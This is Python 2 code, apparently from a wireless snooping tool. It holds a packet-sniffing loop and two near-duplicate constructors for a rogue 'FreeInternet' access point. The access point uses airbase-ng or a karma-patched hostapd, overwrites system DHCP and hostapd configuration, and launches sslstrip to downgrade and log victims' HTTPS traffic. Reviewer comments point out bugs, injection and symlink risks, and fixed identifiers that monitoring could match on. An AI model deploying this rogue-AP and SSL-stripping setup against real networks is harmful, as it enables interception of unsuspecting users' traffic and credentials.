def run(self):
    """Parse a capture file once, or sniff live until asked to stop.

    When ``self.pcap`` is set, ``self.parse_pcap()`` is called and the method
    returns. Otherwise it loops while ``self.STOP_SNIFFING`` is false,
    optionally asks ``mm.enable_monitor_mode`` for a monitor interface, and
    hands every captured packet to ``self.packeteer`` through ``sniff``.

    NOTE(review): the listing had lost its line breaks and indentation. The
    nesting below is reconstructed; confirm it against the original file,
    in particular the position of the final ``time.sleep(5)``.
    """
    if self.pcap:
        # Offline mode: no interface is touched.
        self.parse_pcap()
    else:
        # True once the "no monitor interface" error has been logged, so the
        # retry loop does not repeat it every 5 seconds.
        shownMessage = False
        while not self.STOP_SNIFFING:
            if self.enable_monitor_mode:
                # The helper's return value replaces self.iface; a falsy
                # result is handled as "no interface available".
                self.iface=mm.enable_monitor_mode(self.iface)
                if not self.iface:
                    if not shownMessage:
                        logging.error("No suitable monitor interface available. Will check every 5 seconds, but not display this message again.")
                        shownMessage = True
                    time.sleep(5)
            if not self.iface and self.enable_monitor_mode:
                # Monitor mode was requested but is unavailable: retry instead
                # of falling through to the capture on all interfaces.
                continue
            if not self.iface:
                # A falsy iface is passed to sniff() unchanged; per the log
                # message, that means capturing on every interface.
                logging.info("No interface specified. Will sniff *all* interfaces.")
            else:
                logging.info("Starting sniffing on interface '%s'"%self.iface)
            try:
                # Set before sniff() is entered, so the flag means "about to
                # capture" rather than "capture confirmed running".
                self.ready_status = True
                # Re-arm the one-time error message for a later interface loss.
                shownMessage = False
                # store=0 keeps no packet list; each packet goes to the
                # callback. NOTE(review): stopper/stopperTimeout are not
                # parameters of stock Scapy's sniff(); presumably a patched
                # sniff is in scope - confirm.
                sniff(store=0, iface=self.iface, prn=self.packeteer,
                      filter=self.bfilter, stopperTimeout=1,
                      stopper=self.stopperCheck)
            # Python 2 "except X, e" syntax; this block does not parse on Python 3.
            except Exception, e:
                logging.error(("Scapy exception whilst sniffing. "
                               "Will back off for 5 seconds, "
                               "and try restart '%s' plugin") % __name__)
                # Logs only the exception's message, without a traceback.
                logging.error(e)
                self.sniffErrors+=1
                # NOTE(review): this fires once more than 3 errors have been
                # counted, while the message says 5. Nothing here restarts the
                # module or resets sniffErrors, so after the threshold the
                # message repeats on every further failure.
                if self.sniffErrors >3 :
                    logging.error("Restarting module '%s' after 5 failed attempts" %__file__)
                # Back-off announced in the error message above.
                time.sleep(5)
def __init__(self, **kwargs):
    """Set up a rogue access point from keyword options.

    Reads settings from ``kwargs`` and builds the command strings for
    airbase-ng or hostapd, ifconfig, dnsmasq and sslstrip_snoopy. None of
    those strings is executed in this method. The constructor does have
    direct side effects: it overwrites /etc/hostapd.conf and
    /etc/dnsmasq.conf, touches /etc/dhcpd.leases and /tmp/sslstrip.log,
    starts a pyinotify notifier on those two files, opens the sslstrip log
    for reading, and calls ``self.run_sslstrip()`` when sslstrip is enabled.
    It can also end the process with ``sys.exit(-1)``.

    Keyword options read here: ssid, wlan_iface, net_iface, enable_mon,
    promisc, sslstrip, rogueif, hostapd, hapdconf, hapdcmd, verbose.

    NOTE(review): the listing had lost its line breaks and indentation. The
    nesting below is reconstructed and should be confirmed against the
    original file.
    """
    self.ssid = kwargs.get("ssid", "FreeInternet")
    self.wlan_iface = kwargs.get("wlan_iface", "wlan0mon") # If none, will use first wlan capable of injection
    self.net_iface = kwargs.get("net_iface", "eth0") # iface with outbound internet access
    self.enable_mon = kwargs.get("enable_mon", False) # airmon-ng start <wlan_iface>
    self.promisc = kwargs.get("promisc", False) # Answer all probe requests
    self.do_sslstrip = kwargs.get("sslstrip", False)
    # NOTE(review): this value is overwritten in both branches further down,
    # so a caller-supplied "rogueif" has no effect.
    self.rogueif = kwargs.get("rogueif", "wlan5")
    self.hostapd = kwargs.get("hostapd", False) # Use hostapd instead of airbase-ng
    self.hapdconf = kwargs.get("hapdconf", "/etc/hostapd.conf") # Config file to use for hostapd
    self.hapdcmd = kwargs.get("hapdcmd", "/root/hostapd/2.1-karmaian/hostapd/hostapd") # Binary to use for hostapd
    self.procs = {} #Var to hold external processes, and ensure they keep running
    self.num_procs = 2 # How many procs should be run
    self.verb = kwargs.get('verbose', 0)
    self.already_seen={}
    self.new_leases = deque()
    self.ssl_strip_data = deque()

    # Option values are compared with the string "True". Any other value,
    # including the boolean True, is normalised to False by these four blocks.
    if self.do_sslstrip == "True":
        self.do_sslstrip = True
        #self.num_procs += 1
    else:
        self.do_sslstrip = False
    if self.promisc == "True":
        self.promisc = True
    else:
        self.promisc = False
    if self.enable_mon == "True":
        self.enable_mon = True
    else:
        self.enable_mon = False
    if self.hostapd == "True":
        self.hostapd = True
    else:
        self.hostapd = False

    if self.enable_mon:
        # The helper's return value replaces the configured interface name.
        self.wlan_iface=mm.enable_monitor_mode(self.wlan_iface)
    if not self.wlan_iface:
        logging.error("No wlan_iface specified for rogueAP :(")
        # Only the airbase-ng path exits here; with hostapd enabled the
        # constructor carries on with a falsy interface.
        # NOTE(review): in that case the string concatenations below raise
        # TypeError if wlan_iface is None - confirm this is intended.
        if not self.hostapd:
            sys.exit(-1)

    if self.hostapd:
        # hostapd takes its settings from the config file path alone.
        airb_opts = [self.hapdconf]
        self.airb_cmd = [self.hapdcmd] + airb_opts
        self.rogueif = self.wlan_iface
    else:
        self.rogueif = "at0"
        if self.promisc:
            airb_opts = ['-e', self.ssid, '-P', self.wlan_iface]
        else:
            airb_opts = ['-e', self.ssid, self.wlan_iface]
        self.airb_cmd = ['airbase-ng'] + airb_opts
    # NOTE(review): joining the argument list into one string discards the
    # argument boundaries. If these command strings are later run through a
    # shell (not shown here), an SSID or interface name that contains
    # whitespace or shell metacharacters would be re-interpreted. Keeping the
    # list form and avoiding a shell removes that risk.
    self.airb_cmd = " ".join(self.airb_cmd)
    self.set_ip_cmd = "ifconfig "+self.rogueif+" up 10.0.0.1 netmask 255.255.255.0"

    # Values fixed in the hostapd configuration: BSSID 00:11:22:33:44:00,
    # channel 6, and the SSID from kwargs (default "FreeInternet"). Because
    # they are hard-coded, they are stable values to match on when looking for
    # this access point in wireless monitoring data.
    # NOTE(review): the listing shows the settings separated by spaces;
    # hostapd reads one key=value per line, so the line breaks inside these
    # literals were presumably lost in extraction - confirm.
    # NOTE(review): enable_karma is not an option of stock hostapd; presumably
    # it belongs to the patched build named in the hapdcmd default.
    # NOTE(review): ssid is interpolated unchecked, so a value containing a
    # newline would add arbitrary lines to the configuration file.
    hapd_config_file =""" interface="""+self.rogueif+""" bssid=00:11:22:33:44:00 driver=nl80211 ssid="""+self.ssid+""" channel=6 disassoc_low_ack=0 auth_algs=3 ignore_broadcast_ssid=0 logger_syslog=-1 logger_stdout=-1 logger_syslog_level=1 logger_stdout_level=1 dump_file=/tmp/hostapd.dump ctrl_interface=/var/run/hostapd ctrl_interface_group=0 macaddr_acl=0 enable_karma=1 """
    # NOTE(review): the file is always written to /etc/hostapd.conf, while the
    # command line above uses self.hapdconf, so a caller-supplied hapdconf
    # path is never written by this method. The write also happens when
    # hostapd is disabled, and it replaces any existing system configuration.
    f=open('/etc/hostapd.conf', 'w')
    f.write(hapd_config_file)
    f.close()

    # Vars for DHCP server
    # Clients are offered 10.0.0.2-10.0.0.100 with 10.0.0.1 as router
    # (option 3) and 8.8.8.8 as DNS server (option 6). The 8765h lease is
    # about one year.
    config_file =""" dhcp-range=10.0.0.2,10.0.0.100,255.255.255.0,8765h dhcp-option=3,10.0.0.1 dhcp-option=6,8.8.8.8 dhcp-leasefile=/etc/dhcpd.leases """
    # Overwrites the host's own dnsmasq configuration, if there is one.
    f=open('/etc/dnsmasq.conf', 'w')
    f.write(config_file)
    f.close()
    self.launch_dhcp = "dnsmasq -d -a 10.0.0.1 -i "+self.rogueif+" -C /etc/dnsmasq.conf"

    # Create the lease file if it is missing and refresh its timestamps, so
    # that the watch below has a file to attach to. file() is the Python 2
    # builtin.
    with file("/etc/dhcpd.leases", 'a'):
        os.utime("/etc/dhcpd.leases", None)
    # Same for the sslstrip log.
    # NOTE(review): this is a fixed name in /tmp, and writing under /etc
    # suggests the process is privileged (presumably root - confirm). Opening
    # it this way follows a symlink planted by another local user; a private
    # directory would avoid that.
    with file("/tmp/sslstrip.log", 'a'):
        os.utime("/tmp/sslstrip.log", None)

    wm = pyinotify.WatchManager() # Watch Manager
    # wdd is not used again in this method.
    wdd = wm.add_watch(['/etc/dhcpd.leases', '/tmp/sslstrip.log'], pyinotify.IN_MODIFY, rec=True)
    handler = EventHandler()
    # Gives the event handler a reference back to this object.
    handler.someInstance = self
    self.notifier = pyinotify.ThreadedNotifier(wm, handler)
    # Started in the constructor; no matching stop is visible in this method.
    self.notifier.start()

    # SSL Strip
    self.launch_sslstrip = "sslstrip_snoopy -w /tmp/sslstrip.log -f"
    # Opened whether or not sslstrip is enabled, and kept open on the instance.
    self.fo_ssl = open("/tmp/sslstrip.log", "r")
    if self.do_sslstrip:
        self.run_sslstrip()
def __init__(self, **kwargs):
    """Set up a rogue access point from keyword options.

    Reads settings from ``kwargs`` (the default wireless interface here is
    "mon0") and builds the command strings for airbase-ng or hostapd,
    ifconfig, dnsmasq and sslstrip_snoopy. None of those strings is executed
    in this method. The constructor does have direct side effects: it
    overwrites /etc/hostapd.conf and /etc/dnsmasq.conf, touches
    /etc/dhcpd.leases and /tmp/sslstrip.log, starts a pyinotify notifier on
    those two files, opens the sslstrip log for reading, and calls
    ``self.run_sslstrip()`` when sslstrip is enabled. It can also end the
    process with ``sys.exit(-1)``.

    Keyword options read here: ssid, wlan_iface, net_iface, enable_mon,
    promisc, sslstrip, rogueif, hostapd, hapdconf, hapdcmd, verbose.

    NOTE(review): the listing had lost its line breaks and indentation. The
    nesting below is reconstructed and should be confirmed against the
    original file.
    """
    self.ssid = kwargs.get("ssid", "FreeInternet")
    self.wlan_iface = kwargs.get("wlan_iface", "mon0") # If none, will use first wlan capable of injection
    self.net_iface = kwargs.get("net_iface", "eth0") # iface with outbound internet access
    self.enable_mon = kwargs.get("enable_mon", False) # airmon-ng start <wlan_iface>
    self.promisc = kwargs.get("promisc", False) # Answer all probe requests
    self.do_sslstrip = kwargs.get("sslstrip", False)
    # NOTE(review): assigned again in both branches of the hostapd/airbase-ng
    # choice below, so the "rogueif" option is effectively ignored.
    self.rogueif = kwargs.get("rogueif", "wlan5")
    self.hostapd = kwargs.get("hostapd", False) # Use hostapd instead of airbase-ng
    self.hapdconf = kwargs.get("hapdconf", "/etc/hostapd.conf") # Config file to use for hostapd
    self.hapdcmd = kwargs.get("hapdcmd", "/root/hostapd/2.1-karmaian/hostapd/hostapd") # Binary to use for hostapd
    self.procs = {} #Var to hold external processes, and ensure they keep running
    self.num_procs = 2 # How many procs should be run
    self.verb = kwargs.get('verbose', 0)
    self.already_seen={}
    self.new_leases = deque()
    self.ssl_strip_data = deque()

    # Flags are enabled only by the exact string "True". Every other value,
    # including a real boolean True, ends up as False.
    if self.do_sslstrip == "True":
        self.do_sslstrip = True
        #self.num_procs += 1
    else:
        self.do_sslstrip = False
    if self.promisc == "True":
        self.promisc = True
    else:
        self.promisc = False
    if self.enable_mon == "True":
        self.enable_mon = True
    else:
        self.enable_mon = False
    if self.hostapd == "True":
        self.hostapd = True
    else:
        self.hostapd = False

    if self.enable_mon:
        # Whatever the helper returns becomes the interface used from here on.
        self.wlan_iface=mm.enable_monitor_mode(self.wlan_iface)
    if not self.wlan_iface:
        logging.error("No wlan_iface specified for rogueAP :(")
        # The process exits only when airbase-ng is in use; the hostapd path
        # continues with a falsy interface.
        # NOTE(review): the concatenations below raise TypeError if wlan_iface
        # is None at that point - confirm this is intended.
        if not self.hostapd:
            sys.exit(-1)

    if self.hostapd:
        # The hostapd command line is the binary followed by the config path.
        airb_opts = [self.hapdconf]
        self.airb_cmd = [self.hapdcmd] + airb_opts
        self.rogueif = self.wlan_iface
    else:
        self.rogueif = "at0"
        if self.promisc:
            airb_opts = ['-e', self.ssid, '-P', self.wlan_iface]
        else:
            airb_opts = ['-e', self.ssid, self.wlan_iface]
        self.airb_cmd = ['airbase-ng'] + airb_opts
    # NOTE(review): the list is flattened into a single string, which loses
    # the argument boundaries. How the string is executed is not shown here.
    # If a shell is involved, an SSID or interface name with whitespace or
    # shell metacharacters would be re-parsed. Passing the list without a
    # shell avoids that.
    self.airb_cmd = " ".join(self.airb_cmd)
    self.set_ip_cmd = "ifconfig "+self.rogueif+" up 10.0.0.1 netmask 255.255.255.0"

    # The hostapd configuration fixes the BSSID to 00:11:22:33:44:00 and the
    # channel to 6, and takes the SSID from kwargs (default "FreeInternet").
    # Those constants are what wireless monitoring would observe from this
    # configuration.
    # NOTE(review): the settings appear space-separated in the listing;
    # hostapd expects one key=value per line, so the newlines inside these
    # literals were presumably dropped in extraction - confirm.
    # NOTE(review): enable_karma is not a stock hostapd option; it presumably
    # comes from the patched build that the hapdcmd default points to.
    # NOTE(review): ssid is inserted without validation, so a newline in it
    # would inject further configuration lines.
    hapd_config_file =""" interface="""+self.rogueif+""" bssid=00:11:22:33:44:00 driver=nl80211 ssid="""+self.ssid+""" channel=6 disassoc_low_ack=0 auth_algs=3 ignore_broadcast_ssid=0 logger_syslog=-1 logger_stdout=-1 logger_syslog_level=1 logger_stdout_level=1 dump_file=/tmp/hostapd.dump ctrl_interface=/var/run/hostapd ctrl_interface_group=0 macaddr_acl=0 enable_karma=1 """
    # NOTE(review): the target path is hard-coded and self.hapdconf is not
    # used for the write, so a custom hapdconf is passed to hostapd without
    # having been generated here. The file is written in airbase-ng mode too
    # and replaces any existing /etc/hostapd.conf.
    f=open('/etc/hostapd.conf', 'w')
    f.write(hapd_config_file)
    f.close()

    # Vars for DHCP server
    # Address pool 10.0.0.2-10.0.0.100, router 10.0.0.1 (option 3), DNS server
    # 8.8.8.8 (option 6), and a lease time of 8765h (about one year).
    config_file =""" dhcp-range=10.0.0.2,10.0.0.100,255.255.255.0,8765h dhcp-option=3,10.0.0.1 dhcp-option=6,8.8.8.8 dhcp-leasefile=/etc/dhcpd.leases """
    # Replaces an existing system-wide dnsmasq configuration.
    f=open('/etc/dnsmasq.conf', 'w')
    f.write(config_file)
    f.close()
    self.launch_dhcp = "dnsmasq -d -a 10.0.0.1 -i "+self.rogueif+" -C /etc/dnsmasq.conf"

    # Ensure the lease file exists and update its timestamps before it is
    # watched. file() is the Python 2 builtin.
    with file("/etc/dhcpd.leases", 'a'):
        os.utime("/etc/dhcpd.leases", None)
    # Likewise for the sslstrip log.
    # NOTE(review): this is a predictable path in /tmp, and the writes to /etc
    # suggest the process is privileged (presumably root - confirm). If
    # another local user pre-creates the path as a symlink, the open follows
    # it; a directory private to this process would prevent that.
    with file("/tmp/sslstrip.log", 'a'):
        os.utime("/tmp/sslstrip.log", None)

    wm = pyinotify.WatchManager() # Watch Manager
    # The return value is stored in wdd, which is not read later in this method.
    wdd = wm.add_watch(['/etc/dhcpd.leases', '/tmp/sslstrip.log'], pyinotify.IN_MODIFY, rec=True)
    handler = EventHandler()
    # Back-reference so the handler can reach this instance.
    handler.someInstance = self
    self.notifier = pyinotify.ThreadedNotifier(wm, handler)
    # The notifier is started here; stopping it is not handled in this method.
    self.notifier.start()

    # SSL Strip
    self.launch_sslstrip = "sslstrip_snoopy -w /tmp/sslstrip.log -f"
    # The read handle is opened unconditionally and stays on the instance.
    self.fo_ssl = open("/tmp/sslstrip.log", "r")
    if self.do_sslstrip:
        self.run_sslstrip()